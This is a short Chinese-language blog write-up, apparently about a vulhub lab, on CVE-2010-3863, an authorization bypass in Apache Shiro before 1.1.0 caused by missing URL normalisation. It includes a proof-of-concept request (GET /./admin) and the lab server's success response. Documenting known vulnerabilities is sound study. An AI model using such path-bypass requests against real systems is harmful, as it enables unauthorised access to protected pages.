CVE-2010-3863 Apache Shiro越权漏洞

By king 2024年10月26日No Comments

CVE-2010-3863 Apache Shiro越权漏洞

简介

Apache Shiro是一个功能强大且易于使用的Java权限安全框架，提供了认证，授权，加密，和会话管理
认证框架

CVE-2010-3863

1.描述

在Apache Shiro 1.1.0以前的版本中
一个越权漏洞

2.原理

shiro 进行权限验证前未对url 做标准化处理，攻击者可以构造/、//、/./、/…/ 等绕过权限验证

3.POC

请求
- GET /./admin HTTP/1.1
  Host: 192.168.76.138:8080
响应
- HTTP/1.1 200
  Content-Type: text/html;charset=UTF-8
  Content-Language: en
  Date: Sun, 03 Sep 2023 01:01:36 GMT
  Content-Length: 196
  
  <!DOCTYPE html>
  <html lang=”en”>
  <head>
  <meta charset=”UTF-8″>
  <title>Congrats</title>
  </head>
  <body>
  <h1>Congrats</h1>
  <p>You have successfully logged in</p>
  </body>
  </html>

Apache Shiro vulhub 越权漏洞

Last updated on 2024年10月28日

king

大家好，我是站长，欢迎大家在下方评论...

Comments

No comments yet. Why don’t you start the discussion?

发表回复取消回复